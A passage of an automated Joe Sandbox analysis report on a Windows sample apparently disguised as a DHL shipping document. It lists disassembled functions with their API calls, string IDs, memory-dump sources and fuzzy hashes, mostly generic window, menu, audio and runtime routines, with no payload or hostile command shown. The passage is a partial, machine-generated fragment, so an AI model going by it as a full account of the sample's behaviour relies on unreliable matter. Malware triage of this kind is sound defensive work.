                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00815357
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00815369
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0081537A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_memmove
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 2279737902-1007645807
                                                                                    • Opcode ID: 76c4b29395c38975207effcded4d3598efb0e2c45707703305856477460d6b49
                                                                                    • Instruction ID: 5f5db1c1fdb2641409cd8f7c045aa4560fcf8a663caca2fddf73dcff22c6dea8
                                                                                    • Opcode Fuzzy Hash: 76c4b29395c38975207effcded4d3598efb0e2c45707703305856477460d6b49
                                                                                    • Instruction Fuzzy Hash: 52119020A50169F9D724B761CC4EEFF6BBCFFE2B44F000529B425E21D1DEA41944C5A0
                                                                                    Function 008146B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 208665112-3771769585
                                                                                    • Opcode ID: c0fc02be30c6e82e89b91020218ec5cca3adee84412d3ad6c0f11e28b6199001
                                                                                    • Instruction ID: 6570237c2cf3023a8927bdd8dfb37f9773af638c218d4769b9f0834af3a95068
                                                                                    • Opcode Fuzzy Hash: c0fc02be30c6e82e89b91020218ec5cca3adee84412d3ad6c0f11e28b6199001
                                                                                    • Instruction Fuzzy Hash: CD11D531900118ABCB24AB74DC4AEDA77BCFF52711F0409B6F549D6192EF7489C28AA0
                                                                                    Function 00814F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 00814F7A
                                                                                      • Part of subcall function 007D049F: timeGetTime.WINMM(?,75A8B400,007C0E7B), ref: 007D04A3
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00814FA6
                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00814FCA
                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00814FEC
                                                                                    • SetActiveWindow.USER32 ref: 0081500B
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00815019
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00815038
                                                                                    • Sleep.KERNEL32(000000FA), ref: 00815043
                                                                                    • IsWindow.USER32 ref: 0081504F
                                                                                    • EndDialog.USER32(00000000), ref: 00815060
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: f2f45b1c9efed4dbc899ffff3126f9c69edd256328aa0fd1e1fd69d59a3f3772
                                                                                    • Instruction ID: 520dfcf555ea4f3cf36c1271b95a210d65ccc2e22967266b72d2100fa5ed8f64
                                                                                    • Opcode Fuzzy Hash: f2f45b1c9efed4dbc899ffff3126f9c69edd256328aa0fd1e1fd69d59a3f3772
                                                                                    • Instruction Fuzzy Hash: 34219F70600A04EFE7115F60FD8DA663B6DFF98745F042428F209C22B6FB618DD4A6A2
                                                                                    Function 0081D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • CoInitialize.OLE32(00000000), ref: 0081D5EA
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0081D67D
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0081D691
                                                                                    • CoCreateInstance.OLE32(00842D7C,00000000,00000001,00868C1C,?), ref: 0081D6DD
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0081D74C
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0081D7A4
                                                                                    • _memset.LIBCMT ref: 0081D7E1
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0081D81D
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0081D840
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0081D847
                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0081D87E
                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0081D880
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1246142700-0
                                                                                    • Opcode ID: 401c431084c6822183afa58456fcf9c21e82e86827cea08b77e406967baf5990
                                                                                    • Instruction ID: d240c1452aa2e0ff33af2af3473f6b739269279aa161373af4a670d3c55bab24
                                                                                    • Opcode Fuzzy Hash: 401c431084c6822183afa58456fcf9c21e82e86827cea08b77e406967baf5990
                                                                                    • Instruction Fuzzy Hash: 46B1BA75A00209EFDB04DFA4C888EAEBBB9FF49314F148469E919DB261DB34ED45CB50
                                                                                    Function 0080C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0080C283
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0080C295
                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0080C2F3
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0080C2FE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0080C310
                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0080C364
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0080C372
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0080C383
                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0080C3C6
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0080C3D4
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0080C3F1
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0080C3FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
                                                                                    • Instruction ID: 22ef11eb4b163419261983df00a5d125b89dd9c65be017c00dd14f276495797f
                                                                                    • Opcode Fuzzy Hash: a36a3834fb57bf8bdb85e40a249fefd8ea3f33dc369fc12c5af8a80dcbb00d86
                                                                                    • Instruction Fuzzy Hash: 63514071B00205AFDB18CFA9DD8AAAEBBB6FB98310F14862DF615D72D1D7709D008B50
                                                                                    Function 007B201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007B2036,?,00000000,?,?,?,?,007B16CB,00000000,?), ref: 007B1B9A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007B20D3
                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007B216E
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007EBCA6
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBCD7
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBCEE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007EBD0A
                                                                                    • DeleteObject.GDI32(00000000), ref: 007EBD1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: 607875432968c6a584e881717ccb44d7b0955ec62cff03879b4897d2c91061f1
                                                                                    • Instruction ID: 5d885faa8be738b82e8c0c876006aa0180033c8c6e9e44384f9e2786afe052ac
                                                                                    • Opcode Fuzzy Hash: 607875432968c6a584e881717ccb44d7b0955ec62cff03879b4897d2c91061f1
                                                                                    • Instruction Fuzzy Hash: CF61B030612A44DFCB35AF19CD48B6A7BF1FF44312F60842DE1468A576C7B8A882DB91
                                                                                    Function 007B21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                                                                                    • GetSysColor.USER32(0000000F), ref: 007B21D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: df86f4a30c7c02dc49d2b74b3c470a6e45444f440ac889fc8fb79683dc16ad42
                                                                                    • Instruction ID: 31d5b4af7b54e9f2cff7af77d1d79eaf72e1665e4c6722d37142666e02d16b23
                                                                                    • Opcode Fuzzy Hash: df86f4a30c7c02dc49d2b74b3c470a6e45444f440ac889fc8fb79683dc16ad42
                                                                                    • Instruction Fuzzy Hash: 4C419C31402144ABDB255F28EC88BF93B65FB46321F194265FE65CA1E7C7398C42DB61
                                                                                    Function 0081A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,0083F910), ref: 0081A90B
                                                                                    • GetDriveTypeW.KERNEL32(00000061,008689A0,00000061), ref: 0081A9D5
                                                                                    • _wcscpy.LIBCMT ref: 0081A9FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: 0ed01d820f78b4cf2acc1a3081aa129f7a7bc384fa3efd080e3ac3985871f956
                                                                                    • Instruction ID: b19ba7463f63fcbb83d8aef73e759aae61155ed1a79aae536f14de041461d6b2
                                                                                    • Opcode Fuzzy Hash: 0ed01d820f78b4cf2acc1a3081aa129f7a7bc384fa3efd080e3ac3985871f956
                                                                                    • Instruction Fuzzy Hash: 19518031108301DBC708EF14C896BEFBBA9FF84304F15492DF5A5972A2DB319989CA93
                                                                                    Function 007B9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 421087845-2263619337
                                                                                    • Opcode ID: 8dd2d261acfaa80ce159299d61fdc7576603ae92bd68a8636cd76ef5ec8708d9
                                                                                    • Instruction ID: 33d8c08e68f7eb9041ed7cc1b0ef2853e0693c7702d4921d52406d2bc68a9bc0
                                                                                    • Opcode Fuzzy Hash: 8dd2d261acfaa80ce159299d61fdc7576603ae92bd68a8636cd76ef5ec8708d9
                                                                                    • Instruction Fuzzy Hash: 5441C371600205EEDB24DF35D846BBA77F9FF49300F2044AEE659D7392EA399942CB11
                                                                                    Function 00837152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0083716A
                                                                                    • CreateMenu.USER32 ref: 00837185
                                                                                    • SetMenu.USER32(?,00000000), ref: 00837194
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00837221
                                                                                    • IsMenu.USER32(?), ref: 00837237
                                                                                    • CreatePopupMenu.USER32 ref: 00837241
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0083726E
                                                                                    • DrawMenuBar.USER32 ref: 00837276
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0$F
                                                                                    • API String ID: 176399719-3044882817
                                                                                    • Opcode ID: c2108d0bf65dc65194162141600bfb54935f5480a0bace44f8d01dff545c4163
                                                                                    • Instruction ID: f1670820d3158d3f8a3e3542c5deb1de3e094453495de9d030dda2b81362c515
                                                                                    • Opcode Fuzzy Hash: c2108d0bf65dc65194162141600bfb54935f5480a0bace44f8d01dff545c4163
                                                                                    • Instruction Fuzzy Hash: 2B4149B5A01209EFDB20DF64D848F9A7BB5FF88310F144429FA4697361D771E910CB90
                                                                                    Function 008374BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0083755E
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00837565
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00837578
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00837580
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083758B
                                                                                    • DeleteDC.GDI32(00000000), ref: 00837594
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0083759E
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008375B2
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008375BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: 4fcd2e681e8d78d766ae1e17d9ee0e462be6592e6f876d229ad7349569d1f66b
                                                                                    • Instruction ID: fcfc2112f80827f144049bd63cc57f0f8cdd852ab752911f030bd3fca7476a0c
                                                                                    • Opcode Fuzzy Hash: 4fcd2e681e8d78d766ae1e17d9ee0e462be6592e6f876d229ad7349569d1f66b
                                                                                    • Instruction Fuzzy Hash: 3E318B72505215BBDF269F64DC09FEA3B69FF89320F110624FA15E20A1D731D811DBE4
                                                                                    Function 007D6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 007D6E3E
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    • __gmtime64_s.LIBCMT ref: 007D6ED7
                                                                                    • __gmtime64_s.LIBCMT ref: 007D6F0D
                                                                                    • __gmtime64_s.LIBCMT ref: 007D6F2A
                                                                                    • __allrem.LIBCMT ref: 007D6F80
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D6F9C
                                                                                    • __allrem.LIBCMT ref: 007D6FB3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D6FD1
                                                                                    • __allrem.LIBCMT ref: 007D6FE8
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007D7006
                                                                                    • __invoke_watson.LIBCMT ref: 007D7077
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction ID: 41f237b75507c53edee99575fa43959d4543712a4c5979bedf5abf15dff16b04
                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction Fuzzy Hash: AE71E476A00B16EBD718AF69DC45B6AB3B9AF08324F14862BF414D73C1F778D9408B90
                                                                                    Function 00812527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812542
                                                                                    • GetMenuItemInfoW.USER32(00875890,000000FF,00000000,00000030), ref: 008125A3
                                                                                    • SetMenuItemInfoW.USER32(00875890,00000004,00000000,00000030), ref: 008125D9
                                                                                    • Sleep.KERNEL32(000001F4), ref: 008125EB
                                                                                    • GetMenuItemCount.USER32(?), ref: 0081262F
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0081264B
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00812675
                                                                                    • GetMenuItemID.USER32(?,?), ref: 008126BA
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00812700
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812714
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00812735
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 372c2c93ea092767bd1d64253328cf0cf84bb3675fc63500dc9c96ceac00f7bc
                                                                                    • Instruction ID: 618c27fc497a8c4b4d03be86ffef5ffcaa9f8cf0aede4c6fd47eb308e85dcbc4
                                                                                    • Opcode Fuzzy Hash: 372c2c93ea092767bd1d64253328cf0cf84bb3675fc63500dc9c96ceac00f7bc
                                                                                    • Instruction Fuzzy Hash: 7C617AB0900249AFDB11DFA4D8889EF7BBDFF41308F140859E942E3291D771ADA5DB61
